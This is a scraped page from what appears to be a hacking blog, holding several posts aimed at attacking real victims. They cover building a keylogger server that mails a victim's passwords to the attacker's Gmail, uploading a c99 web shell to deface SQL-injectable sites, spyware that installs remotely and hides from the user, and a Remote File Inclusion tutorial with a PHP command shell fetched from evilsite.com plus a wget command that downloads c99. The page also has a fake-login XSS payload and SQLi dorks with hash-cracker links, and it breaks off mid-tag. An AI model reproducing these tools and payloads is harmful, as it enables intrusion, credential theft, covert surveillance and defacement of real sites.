<li><b>Disable TaskManager</b>: Disable TaskManager on victim's PC</li> <li><b>Disable Regedit</b>: Disable's Regedit on victim's PC</li> </ul>Check "Trojan Downloader" to Downloade and Execute a trojan on victim's  PC. You can also create a fake error message and scare your victim,  like:<br /> <br /> <br /> <br /> After all click on bild server the exe server file will create in the same directory send this file to your victim.<br /> <br /> Thats it when he/she will run this file you will receive his/her password automatically in your gmail.<br /> <br /> <br /> <br /> <a href="http://adf.ly/1cytg"><span class="Apple-style-span" style="color: blue;">Download Emissary Keylogger</span></a><br /> <br /> Note this is tiny url when you will open it then skip the add...:)</div></div>

Email Hacking Hacking Web Hacking EMISARRY KEYLOOGER HACK EMAIL FACEBOOK ACCOUNT YAHOO AND MSN LIVE EMAILS

1st You need ti download Emissary Keylogger 2nd open and Extract the file into your hardrive you need winrar Make sure that you hav...

Read more »

HOW TO UPLOAD SHELL AND DEFACE

<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjx5qJojk5UVoxSA8g_7zfn3cZkVXpzfmLfCvCabkDsmbUVqQdnRvcGQXd1J2gBH32W4uB1q9eDh2IyiwhCaqXbhd938NSfrFpzgKgL6C918k8B2vjugEdMIBjDUX0OfpdglBe2vsOhhcI/s1600/2119efk.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="213" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjx5qJojk5UVoxSA8g_7zfn3cZkVXpzfmLfCvCabkDsmbUVqQdnRvcGQXd1J2gBH32W4uB1q9eDh2IyiwhCaqXbhd938NSfrFpzgKgL6C918k8B2vjugEdMIBjDUX0OfpdglBe2vsOhhcI/s320/2119efk.jpg" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /> </div><div style="text-align: center;"><br /> </div><br /> <br /> <div dir="ltr" style="text-align: left;" trbidi="on"><b>What we need:</b><br /> <br /> <br /> <br /> 1-A Shell (Will be provided)<br /> <br /> 2-A website vulnerable to SQLi<br /> <br /> 3-Image or File upload area on that Vulnerable website<br /> <br /> So firstly <a href="http://adf.ly/1cz7o" id="Y2115506S8" style="color: #000fff; text-decoration: underline;" target="_blank">download</a> the shell here.<br /> <br /> <a href="http://adf.ly/1cz7o"> Download </a><br /> <br /> <b>What is Shell ?</b><br /> <br /> A shell script is a script written for the shell, or command line  interpreter, of an operating system. It is often considered a simple  domain-specific programming language. Typical operations performed by  shell scripts include file manipulation, program execution, and printing  text.<br /> <br /> This is a plain c99 shell, BUT it is Undetected so you should not get a  warning from a anti virus if you download it. (update: not Undetected  anymore )<br /> <br /> I am not going to explain SQLi just how to deface.<br /> <br /> Sql Tut- http://hackingmania.com/Blog/sql-injection-and-defacement-for-beginners-tutorial<br /> <br /> So now go get yourself a vulnerable site, hack it and get the Admin Login details and get the Admin Page address.<br /> <br /> Now login to the admin page with the admin details you got.<br /> <br /> Go through the admin page until you find a place where you can upload a picture (Usually a picture).<br /> <br /> Now you have to upload the shell. Right if you don’t get an error it is all good.<br /> <br /> Now to find the shell<br /> <br /> Go through the site until you find any image and if you are using firefox Right<br /> <br /> - Click on it and “Copy Image Location”<br /> <br /> Make a new tab and paste it there.<br /> <br /> It will probably look something like this:<br /> <br /> <i>http://www.example.com/images/photonamehere.jpg</i><br /> <br /> So now that we know that change “/photonamehere.jpg” to “/c99ud.php.jpg” (Without Qoutes)<br /> <br /> Now a page will come up looking like this:<br /> <br /> <a href="http://hackingmania.com/Blog/how-to-upload-shell-and-deface-tutorial/%20/igz03k" rel="attachment wp-att-972"><img alt="igz03k How To Upload Shell and Deface   Tutorial" class="aligncenter size-full wp-image-972" height="342" src="http://hackingmania.com/Blog/wp-content/uploads/2011/03/igz03k.jpg" title="igz03k" width="639" /></a><br /> <br /> Does probably not look like that but will look similar.<br /> <br /> Now you have access to all the files on the site<br /> <br /> What you want to do is now,<br /> <br /> Find index.php or whatever the main page is, and replace it with your HTML code for your Deface Page.<br /> <br /> Then you can either delete all the other files OR (and I recommend this) Let it redirect to the main page.<br /> <br /> Keep in mind:<br /> <br /> • Change Admin Username and Password <br /> <br /> •The people have FTP access so you need to change that Password too .<br /> <br /> •Always use a Proxy or VPN</div><br /> </div>

Web Hacking HOW TO UPLOAD SHELL AND DEFACE

What we need: 1-A Shell (Will be provided) 2-A website vulnerable to SQLi 3-Image or File upload area on that Vulnerable website...

Read more »

Sql Poison v1.0 - The Exploit Scanner

<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlYBfAFPYw9Ly6CzEYv-tB5_N5HsJXxHF16LiDtVrcSybnZPK2XP9-9W2WQab95sb410Q61VaFzjNZ4jkPosm2iCPo2EuVYkQDmML4BzxVCJ8Ul9GbWDUwR6IA7eejqDDYoghHIZaOayw/s640/sql_injection.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlYBfAFPYw9Ly6CzEYv-tB5_N5HsJXxHF16LiDtVrcSybnZPK2XP9-9W2WQab95sb410Q61VaFzjNZ4jkPosm2iCPo2EuVYkQDmML4BzxVCJ8Ul9GbWDUwR6IA7eejqDDYoghHIZaOayw/s640/sql_injection.gif" /></a></div><br /> The tool is multithreading and has three tools in one.<br /> <br /> <br /> <br /> <span style="color: gold;"><span style="font-weight: bold;">Scanner</span></span><br /> <br /> Includes 5 search engines. Google API, SearchQu, Search.ConDoit, <br /> <br /> Google official, BLACKLE for finding site lists.<br /> <br /> Domain filter for finding specific type sites like (com, edu, ae, pk etc).<br /> <br /> Max search limit.<br /> <br /> Export list to file.<br /> <br /> Search Highlighting.<br /> <br /> Duplicates Removing<br /> <br /> <img alt="[Image: scannera.png]" border="0" height="435" src="http://img205.imageshack.us/img205/274/scannera.png" width="640" /><br /> <br /> <br /> <br /> <span style="color: gold;"><span style="font-weight: bold;">Sqli Crawler</span></span><br /> <br /> Scan for vulnerable sites using error against responses list.<br /> <br /> Export list to file.<br /> <br /> Search Highlighting.<br /> <br /> <img alt="[Image: crawler.png]" border="0" height="435" src="http://img594.imageshack.us/img594/951/crawler.png" width="640" /><br /> <br /> <br /> <br /> <span style="color: gold;"><span style="font-weight: bold;">Injection Builder</span></span><br /> <br /> To make malicious sqli strings.<br /> <br /> Contains lots of functions.<br /> <br /> <img alt="[Image: builder.png]" border="0" height="253" src="http://img197.imageshack.us/img197/8607/builder.png" width="640" /><br /> <br /> <br /> <br /> Anyway. Your comments are precious.<br /> <br /> <br /> <br /> <br /> <br /> Download Link:<b><a href="http://adf.ly/1rU3K" target="_blank">   Sql Poison v1.0 - The Exploit Scanner</a></b></div>

Hacking Web Hacking Sql Poison v1.0 - The Exploit Scanner

The tool is multithreading and has three tools in one. Scanner Includes 5 search engines. Google API, SearchQu, Search.ConDoit, Goo...

Read more »

Remote password hacking software - sniperspy

<img src="http://www.sniperspy.com/images/box6b.gif" />SniperSpy is the industry leading Remote password hacking software combined with the Remote Install and Remote Viewing feature.<br /> <br /> Once installed on the remote PC(s) you wish, you only need to login to your own personal SniperSpy account to view activity logs of the remote PC’s! This means that you can view logs of the remote PC’s from anywhere in the world as long as you have internet access!<br /> <br /> Do you want to Spy on a Remote PC? Expose the truth behind the lies! Unlike the rest, SniperSpy allows you to remotely spy any PC like a television! Watch what happens on the screen LIVE! The only remote PC spy software with a SECURE control panel! This Remote PC Spy software also saves screenshots along with text logs of chats, websites, keystrokes in any language and more. Remotely view everything your child, employee or anyone does while they use your distant PC. Includes LIVE admin and control commands!<br /> <br /> <br /> <br /> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8NMYTX_4wagzEVtPZKBKjqhPrezkZJ6gIxUjcHtX6uyRe54_IX8qlmsGOzQhvNgHjFEKYYvDYLyFGNiQVnXgicRv5or3SWcjjCW4QqEcqw0dX_bcQvkH5_MZ_NeKRW8MvmHkARLw4sno/s400/sniper-spy.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="304" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8NMYTX_4wagzEVtPZKBKjqhPrezkZJ6gIxUjcHtX6uyRe54_IX8qlmsGOzQhvNgHjFEKYYvDYLyFGNiQVnXgicRv5or3SWcjjCW4QqEcqw0dX_bcQvkH5_MZ_NeKRW8MvmHkARLw4sno/s320/sniper-spy.gif" width="320" /></a></div><br /> <br /> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1qGmiftWC0G8nhRyPkEy1U1893X8c2BTYyGFY2AuEPdu6tw1Y0X0_NGvCqpd6P2lvvWOIdOv8THGBYa76Ul0wtDkTa_WUZTWHUTzi_It78WvjQzMSRjBk-tw8KNJhU-PdpThoVrcG1Uk/s400/sniperspy_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="301" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1qGmiftWC0G8nhRyPkEy1U1893X8c2BTYyGFY2AuEPdu6tw1Y0X0_NGvCqpd6P2lvvWOIdOv8THGBYa76Ul0wtDkTa_WUZTWHUTzi_It78WvjQzMSRjBk-tw8KNJhU-PdpThoVrcG1Uk/s320/sniperspy_2.png" width="320" /></a></div><br /> <br /> <br /> <br /> <span class="Apple-style-span" style="font-size: large;">SniperSpy Features:</span><br /> <br /> 1. SniperSpy is remotely-deployable spy software<br /> <br /> <br /> 2. Invisibility Stealth Mode Option. Works in complete stealth mode. Undetectable!<br /> <br /> 3. Logs All Keystrokes<br /> <br /> <br /> <br /> <br /> <br /> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5UWxDX2JffrchWnpEDqcvNJwpcN0lwafsSGQ9arOQ8hJd2-1JFHE7k7xnzW8WiNP7GyA-JedSpcjAb0JYwl1upSXqEXHArdgEGJVO2kvQx3exkG1PPTEjlZqu5FtWF-xVVe3eqpY72Lg/s320/sniperspy_cheating_spouse_keylogger.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5UWxDX2JffrchWnpEDqcvNJwpcN0lwafsSGQ9arOQ8hJd2-1JFHE7k7xnzW8WiNP7GyA-JedSpcjAb0JYwl1upSXqEXHArdgEGJVO2kvQx3exkG1PPTEjlZqu5FtWF-xVVe3eqpY72Lg/s320/sniperspy_cheating_spouse_keylogger.jpg" /></a></div><br /> <br /> 4. Records any Password (Email, Login, Instant Messenger etc.)<br /> <br /> <br /> <br /> <br /> <br /> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCkDXm0yVhRVFrcqaa9KkXcHFBOiX4yMKd90nxl4ku0BJOHL6cE9WLetCNcg5HMhPW9FRbfzplew1gUyjBWppOfyfCZB8pcpa8jilC5PopmIsg3fRDJ4TDgy8TEFjitB6WPZ__zCjHl1Y/s400/SniperSpy3+%281%29.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="204" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCkDXm0yVhRVFrcqaa9KkXcHFBOiX4yMKd90nxl4ku0BJOHL6cE9WLetCNcg5HMhPW9FRbfzplew1gUyjBWppOfyfCZB8pcpa8jilC5PopmIsg3fRDJ4TDgy8TEFjitB6WPZ__zCjHl1Y/s320/SniperSpy3+%281%29.jpg" width="320" /></a></div><br /> <br /> 5. Remote Monitor Entire IM Conversations so that you can spy on IM activities too<br /> <br /> 6. Captures a full-size jpg picture of the active window however often you wish<br /> <br /> 7. Real Time Screen Viewer<br /> <br /> <br /> 8. Remotely reboot or shutdown the PC or choose to logoff the current Windows user<br /> <br /> 9. Completely Bypasses any Firewall<br /> <br /> <br /> <br /> <span class="Apple-style-span" style="font-size: large;">What if i dont have physical acess to victims computer?</span><br /> <br /> <br /> <br /> <br /> <br /> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLTfl1kAIKmEAwX_p2T2TSvvQ9A9AhA00QCbQzIvLi2TPagHZIjsihRHog8PaE7-BACy0cErmZszDU7T5bXbWIDYqtsSPdTb27p3T-fmhhUbrpJ-qbE9xw8eeZe-shPRauX0TCs7zKENU/s400/sniperspy3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="184" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLTfl1kAIKmEAwX_p2T2TSvvQ9A9AhA00QCbQzIvLi2TPagHZIjsihRHog8PaE7-BACy0cErmZszDU7T5bXbWIDYqtsSPdTb27p3T-fmhhUbrpJ-qbE9xw8eeZe-shPRauX0TCs7zKENU/s320/sniperspy3.jpg" width="320" /></a></div><br /> <br /> No physical access to your remote PC is needed to install the spy software. Once installed you can view the screen LIVE and browse the file system from anywhere anytime. You can also view chats, websites, keystrokes in any language and more, with screenshots.<br /> <br /> <br /> <br /> This software remotely installs to your computer through email. Unlike the other remote spy titles on the market, SniperSpy is fully and completely compatible with any firewall including Windows XP, Windows Vista and add-on firewalls.<br /> <br /> <br /> <br /> The program then records user activities and sends the data to your online account. You login to your account SECURELY to view logs using your own password-protected login. You can access the LIVE control panel within your secure online account.<br /> <br /> <br /> <br /> <br /> <span class="Apple-style-span" style="font-size: large;">Why would I need SniperSpy?</span><br /> <br /> <br /> <br /> Do you suspect that your child or employee is inappropriately using your unreachable computer? If yes, then this software is ideal for you. If you can't get to your computer and are worried about the Internet safety or habits of those using it, then you NEED <a href="http://adf.ly/1qn8S" k="http://www.kehalim.com/aff?u=http%3A%2F%2Fadf.ly%2FPsw6&r=269352&p=6370087"><b>SniperSpy</b></a><b>.</b><br /> <br /> <br /> <br /> This high-tech spy software will allow you to see exactly what your teenager is doing in MySpace and elsewhere in real time. It will also allow you to monitor any employee who uses the company computer(s).

Email Hacking Hacking Web Hacking Remote password hacking software - sniperspy

SniperSpy is the industry leading Remote password hacking software combined with the Remote Install and Remote Viewing feature. Once insta...

Read more »

Remote File Inclusion (RFI) – Tutorial

<div class="separator" style="clear: both; text-align: center;"><a href="http://www.starthack.com/wp-content/uploads/2011/05/Untitled-1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="165" src="http://www.starthack.com/wp-content/uploads/2011/05/Untitled-1.jpg" width="320" /></a></div><br /> <b>What is RFI ?</b><br /> <br /> RFI stands for Remote File Inclusion, examples of RFI is the bloated “C99″ script.As good as this script is, its not practical its too big and fills the access logs like a jew. Its highly noticeable.<br /> <b>What is the point in it?</b><br /> Contrary to popular belief, not all website is hacking <span6471497>is SQL</span6471497> <img alt="icon smile Remote File Inclusion (RFI) Tutorial" class="wp-smiley" src="http://hackingmania.com/Blog/wp-includes/images/smilies/icon_smile.gif" title="Remote File Inclusion (RFI) Tutorial" /> RFI is great because you <span6471497>can get</span6471497> access too and edit all files on the <span6471497>server</span6471497> it makes defacements and stealing classified material as easy as … wget?<br /> <b>What do I need to be able to do this?</b><br /> <br /> Well basically, a <span6471497>web browser</span6471497>, a simple PHP RFI Script (Will teach you a simple one) and some basic knowledge of BASH (Most servers are linux/<span6471497>unix</span6471497> so you might need this .<br /> <b>Lets go!</b><br /> Okay! So, to start with we need a vulnerable site… How do you find these? Well a g00gle d0rk can help you … Alot. RFI’s work by tricking the server into downloading and executing code thats not actually on it, say a website was<i></i><br /> <i>http://shittysite.com/index.php?page=about</i><br /> This could be a site that pulls in .txt documents to display as pages, very very insecure yet people still do it.. Anyway, this either uses the PHP include function we can exploit this… How?<br /> <i>http://shittysite.com/index.php?page=http://evilsite.com/ourscript.txt</i><br /> <br /> Now this could work, it could work quite well. If the site is vulnerable something would happen but I will get into what in a minute.<br /> So, you might of noticed that I added the .txt extension, this might not work as the ?page=about had no .txt extension. This could be because the script automatically appends the .txt file extension (the error you will get is something about it not being able to include ourscript.txt.txt), now as it is appending .txt we can just put ourscript and it will still work, however if it auto-appends something along the lines of .php then we have to use a null byte which is .<br /> Okay, so what do we actually put into ourscript.txt before we do this? Well it could be something like the C99, but unless that script is uploaded instead of included you will get a ton of errors and none of the features will work so instead we have to build our own little script to get this baby working.<br /> <b>Code :</b><br /> <i><code><?php</code></i><br /> <i><code><br /> </code></i><br /> <i><code>echo "<script><span6471497>alert</span6471497>(1337);</script>";<br /> <br /> <br /> echo "Executing command: ".htmlspecialchars($_GET['cmd']);</code></i><br /> <i><code>system($_GET['cmd']);</code></i><br /> <br /> <i><code>?></code></i><br /> Something like that will work, as we can send a command to the linux/unix server in bash as well as testing if its RFI vulnerable with the alert box.<br /> <br /> Ok, so if it worked we are in luck as we can now send a few commands to the server.<br /> <br /> To start with lets try and list all the documents in the current directory. Anyone who knows any bash will know that the list command is ls not dir.<br /> So we do:<br /> <i>http//shittysite.com/index.php?cmd=ls&page=http://evilsite.com/ourscript</i><br /> <br /> That then sends the cmd that we put into our script, and starts to list the documents… This is great! Now we can do anything now, anything at all we can deface the current page using something as simple as<br /> <i><code>cmd=echo This site got pwn3d by hacker > index.php</code></i><br /> That will re-write the index.php and pwn it (Or in the case of a website with .txt extensions you will want to put this into one of the .txt files)<br /> <br /> We can download, remove, rename, anything! But that means you need to know some bash. In case you don’t, not all is lost! You can use the ‘wget’ function to download a c99 script <img alt="icon smile Remote File Inclusion (RFI) Tutorial" class="wp-smiley" src="http://hackingmania.com/Blog/wp-includes/images/smilies/icon_smile.gif" title="Remote File Inclusion (RFI) Tutorial" /> <br /> Ok so how do we do that?<br /> <i>cmd=wget http://evilsite.com/c99.txt</i><br /> now as a .txt the script is going to be useless, well we could use some LFI but we aren’t going to we are just going to rename it!<br /> <br /> <i><code>mv</code></i><br /> Simples..<br /> <i><code>cmd=mv c99.txt <span6471497>hacked</span6471497>.php</code></i><br /> Now by just going to hacked.php the C99 will work and the site can be pwned that way..<br /> This is just a simple tutorial, not too advanced. Its meant to give an overview of RFI, not a complete guide

Articles Web Hacking Remote File Inclusion (RFI) – Tutorial

What is RFI ? RFI stands for Remote File Inclusion, examples of RFI is the bloated “C99″ script.As good as this script is, its not practi...

Read more »

Cross Site Scripting – XSS – Tutorial

<i>Cross Site Scripting – XSS – The Underestimated Exploit</i><br /> <div class="separator" style="clear: both; text-align: center;"><a href="http://www.fireblog.com/wp-content/uploads/2009/06/misquito2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://www.fireblog.com/wp-content/uploads/2009/06/misquito2.jpg" /></a></div><br /> <b>1. What is Cross Site Scripting?</b><br /> Cross Site Scripting (or XSS) is one of the most common application-layer web attacks. XSS commonly targets scripts embedded in a page which are executed on the client-side (in the user’s web browser) rather than on the server-side. XSS in itself is a threat which is brought about by the internet security weaknesses of client-side scripting languages, with HTML and JavaScript (others being VBScript, ActiveX, HTML, or Flash) as the prime culprits for this exploit. The concept of XSS is to manipulate client-side scripts of a web application to execute in the manner desired by the malicious user. Such a manipulation can embed a script in a page which can be executed every time the page is loaded, or whenever an associated event is performed.<br /> A basic example of XSS is when a malicious user injects a script in a legitimate <span3122038>shopping site</span3122038> URL which in turn redirects a user to a fake but identical page. The malicious page would run a script to capture the cookie of the user browsing the shopping site, and that cookie gets sent to the malicious user who can now hijack the legitimate user’s session. Although no real hack has been performed against the shopping site, XSS has still exploited a scripting weakness in the page to snare a user and take command of his session. A trick which often is used to make malicious URLs less obvious is to have the XSS part of the URL encoded in HEX (or other encoding methods). This will look harmless to the user who recognizes the URL he is familiar with, and simply disregards and following ‘tricked’ code which would be encoded and therefore inconspicuous.<br /> <b>2. Site owners are always confident, but so are <span3122038>hackers</span3122038>!</b><br /> Without going into complicated technical details, one must be aware of the various cases which have shown that XSS can have serious consequences when exploited on a vulnerable web application. Many site owners dismiss XSS on the grounds that it cannot be used to steal sensitive data from a back-end database. This is a common mistake because the consequences of XSS against a web application and its customers have been proven to be very serious, both in terms of application functionality and business operation. <span3122038>An online business</span3122038> project cannot afford to lose the trust of its present and future customers simply because nobody has ever stepped forward to prove that their site is really vulnerable to XSS <span3122038>exploits</span3122038>. Ironically, there are stories of site owners who have boldly claimed that XSS is not really a high-risk exploit. This has often resulted in a public challenge which hackers are always itching to accept, with the site owner having to later deal with a defaced application and public embarrassment.<br /> <br /> <b>3. The repercussions of XSS</b><br /> Analysis of different cases which detail XSS exploits teaches us how the constantly changing web technology is nowhere close to making applications more secure. A thorough web search will reveal many stories of large-scale corporation web sites being hacked through XSS exploits, and the reports of such cases always show the same recurring consequences as being of the severe kind.<br /> Exploited XSS is commonly used to achieve the following malicious results:<br /> * Identity theft<br /> <br /> * Accessing sensitive or restricted information<br /> <br /> * Gaining free access to otherwise paid for content<br /> <br /> * Spying on user’s <span3122038>web browsing</span3122038> habits<br /> <br /> <br /> * Altering browser functionality<br /> <br /> * Public defamation of an individual or corporation<br /> <br /> * Web application defacement<br /> <br /> * Denial of Service attacks<br /> Any site owner with a healthy level of integrity would agree that none of the above can really be considered us frivolous or unimportant impacts on a vulnerable site. Security flaws in high-profile web sites have allowed hackers to <span3122038>obtain credit card</span3122038> details and user information which allowed them to perform transactions in their name. Legitimate users have been frequently tricked into clicking a link which redirects them to a malicious but legitimate-looking page which in turn captures all their details and sends them straight to the <span3122038>hacker</span3122038>. This example might not sound as bad as hacking into a corporate database; however it takes no effort to cause site visitors or customers to lose their trust in the application’s security which in turn can result in liability and loss of business.<br /> <b>4. A practical example of XSS on an Acunetix test site.</b><br /> <br /> The following example is not a hacking tutorial. It is just a basic way to demonstrate how XSS can be used to control and modify the functionality of a web page and to re-design the way the page processes its output. The practical use of the example may be freely debated; however anyone may see the regular reports which describe how advanced XSS is used to achieve very complex results, most commonly without being noticed by the user. I encourage also those individuals with no hacking knowledge to try the following example, I am sure you will find it interesting.<br /> 1. Load the following link in your browser:<br /> http://testasp.vulnweb.com/Search.asp<br /> You will notice that the page is a simple page with an input field for running a search<br /> <a href="http://hackingmania.com/Blog/cross-site-scripting-xss-tutorial/%20/xss_1" rel="attachment wp-att-655"><img alt="xss 1 Cross Site Scripting XSS Tutorial " class="aligncenter size-full wp-image-655" height="375" src="http://hackingmania.com/Blog/wp-content/uploads/2011/03/xss_1.jpg" title="xss_1" width="500" /></a><br /> 2. Try to insert the following code into the search field, and notice how a login form will be displayed on the page:<br /> Please login with the form below before proceeding:<br /> <b>Code </b>:<br /> <i><br><br>Please login with the form below before proceeding:<form action=”destination.asp”><table><tr><td>Login:</td><td><input type=text length=20 name=login></td></tr><tr><td>Password:</td><td><input type=text length=20 name=password></td></tr></table><input type=submit value=LOGIN></form></i><br /> <br /> then simply hit the search button after inserting the code.<br /> <a href="http://hackingmania.com/Blog/cross-site-scripting-xss-tutorial/%20/xss_2" rel="attachment wp-att-658"><img alt="xss 2 Cross Site Scripting XSS Tutorial " class="aligncenter size-full wp-image-658" height="375" src="http://hackingmania.com/Blog/wp-content/uploads/2011/03/xss_2.jpg" title="xss_2" width="500" /></a>Through the XSS flaw on the page, it has been possible to create a FAKE login form which can convince gather a user’s credentials. As seen in step 2, the code contains a section which mentions “destination.asp”. That is where a hacker can decide where the FAKE login form will send the user’s log-in details for them to be retrieved and used maliciously.<br /> A hacker can also inject this code by passing it around via the browser’s <span3122038>address bar</span3122038> as follows:<br /> <br /> <b>Code:</b><br /> <i>http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cbr%3E%3Cbr%3EPlease+login+with+the+form+below+before+proceeding%3A%3C form+action%3D%22test.asp%22%3E%3Ctable%3E%3Ctr%3E%3Ctd%3ELogin%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput+type%3Dtext+ length%3D20+name%3Dlogin%3E%3C%2Ftd%3E%3C%2Ftr%3E%3Ctr%3E%3Ctd%3EPassword%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput+type%3Dtext+length%3D20+name%3Dpassword%3E%3C%2Ftd%3E%3C%2Ftr%3E%3C%2Ftable%3E%3Cinput+type%3Dsubmit+value %3DLOGIN%3E%3C%2Fform%3E</i><br /> <i><a href="http://hackingmania.com/Blog/cross-site-scripting-xss-tutorial/%20/xss_3" rel="attachment wp-att-661"><img alt="xss 3 Cross Site Scripting XSS Tutorial " class="aligncenter size-full wp-image-661" height="375" src="http://hackingmania.com/Blog/wp-content/uploads/2011/03/xss_3.jpg" title="xss_3" width="500" /></a></i><br /> This will create the same result on the page, showing how XSS can be used in several different ways to achieve the same result. After the hacker retrieves the user’s log-in credentials, he can easily cause the browser to display the search page as it was originally and the user would not even realize that he has just been fooled. This example may also be seen in use in all those spam emails we all receive. It is very common to find an email in your inbox saying how a certain auctioning site suspects that another individual is using your account maliciously, and it then asks you to click a link to validate your identity. This is a similar method which directs the unsuspecting user to a FAKE version of the auctioning site, and captures the user’s log-in credentials to then send them to the hacker.<br /> <b>5. Why wait to be hacked?</b><br /> <br /> The observation which can be made when new stories of the latest hacks are published is that the sites which belong to the large brands and corporations are hacked in exactly the same way as those sites owned by businesses on a much smaller budget. This clearly shows how lack of security is not a matter of resources, but it is directly dependant on the lack of awareness among businesses of all size. Statistically, 42% of web applications which request security audits are vulnerable to XSS, which is clearly the most recurring high-risk exploit among all the applications tested. The effort to raise awareness about how easy it is for an expert hacker to exploit a vulnerable application does not seem to be going too far. It is still very common to see the “We’ll see when I get hacked” mentality still lingering among site owners who finally risk losing a lot of money and also the trust of their customers. Anybody with the interest to research this matter will see how even individuals claiming to be security experts feel comfortable to state that XSS is over-rated and cannot really be used to achieve serious results on a web application. However further research will also prove that statistical figures speak for themselves, and those same statistics keep growing at a rate which will eventually overcast the claims of those incredulous “experts”.

Web Hacking Cross Site Scripting – XSS – Tutorial

Cross Site Scripting – XSS – The Underestimated Exploit 1. What is Cross Site Scripting? Cross Site Scripting (or XSS) is one of the most...

Read more »

SQL Injection and Defacement For Beginners- Tutorial

<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYzD-MhntDxhPNGMKveRG6LiTGt5N1RKX_Y952PxoALVUhE16mrw0y7gI71jvFRo-WmpckOn3VovHLWUm_o7JbFfakkUZ0N1TxV346snOFbc0_nMqG5x6fL-HvqQM6fjpF0iyMJlpj2sg/s1600/SQL-Injection-Attack.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="222" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYzD-MhntDxhPNGMKveRG6LiTGt5N1RKX_Y952PxoALVUhE16mrw0y7gI71jvFRo-WmpckOn3VovHLWUm_o7JbFfakkUZ0N1TxV346snOFbc0_nMqG5x6fL-HvqQM6fjpF0iyMJlpj2sg/s320/SQL-Injection-Attack.jpg" width="320" /></a></div><br /> 1. <span5015358>What is SQL</span5015358> Injection?<br /> SQL Injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in <span5015358>SQL statements</span5015358> or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.<br /> <b>2. What is Defacement ?</b><br /> A website defacement is an attack on a website that changes the visual appearance of the site. These are typically the work of system crackers, who break into a web server and replace the <span5015358>hosted website</span5015358> with one of their own.<br /> <b>What do you need before you start <span5015358>with SQL</span5015358> Injection.</b><br /> <br /> <i>*You need Admin Finder ( to find admin panel from website )*</i><br /> <br /> <i>*SQL Injection Vulnerable Scanner*</i><br /> <b>Admin Finder:</b><br /> <a href="http://www.mediafire.com/?0a4aw2gmeohndny" onclick="javascript:_gaq.push(['_trackEvent','outbound-article','www.mediafire.com']);" target="_blank">http://www.mediafire.com/?0a4aw2gmeohndny</a><br /> <b>Vulnerable Scanner:</b><br /> <a href="http://seanstar.000space.com/" onclick="javascript:_gaq.push(['_trackEvent','outbound-article','seanstar.000space.com']);" target="_blank">http://seanstar.000space.com/</a> &<br /> <a href="http://newbie.000space.com/sql%20scanner/" onclick="javascript:_gaq.push(['_trackEvent','outbound-article','newbie.000space.com']);" target="_blank">http://newbie.000space.com/sql%20scanner/</a> or you can use Exploit Scanner.<br /> <br /> <b>Dorks for Finding Vulnerable sites!:</b><br /> <b>Common Dorks</b><br /> <i>inurl:members.<span5015358>php</span5015358>?id=</i><br /> <br /> <i>inurl:page.php?id=</i><br /> <br /> <i>inurl:login.php?id=</i><br /> <br /> <i>inurl:index.php?id=</i><br /> <br /> <i>inurl:register.php?id=</i><br /> <br /> <i>inurl:staff.php?id=</i><br /> <br /> <br /> <i>inurl:detail.php?id=</i><br /> <br /> <i>inurl:view.php?id=</i><br /> <b>MD5 Hash Crackers Online:</b><br /> <a href="http://www.md5crack.com/">http://www.md5crack.com</a><br /> <a href="http://www.md5decrypter.com/">http://www.md5decrypter.com</a><br /> <a href="http://www.md5decrypter.co.uk/">http://www.md5decrypter.co.uk</a><br /> <a href="http://md5.rednoize.com/">http://md5.rednoize.com</a><br /> <a href="http://md5decryption.com/">http://md5decryption.com</a><br /> <a href="http://www.md5decrypter.com/">http://www.md5decrypter.com</a><br /> <a href="http://www.blogger.com/goog_417235278"><br /> </a><br /> <a href="http://passcracking.com/">http://passcracking.com</a><br /> <a href="http://md5.my-addr.com/md5_decrypt-md5_c%E2%80%A6r_tool.php">http://md5.my-addr.com/md5_decrypt-md5_c…r_tool.php</a><br /> <a 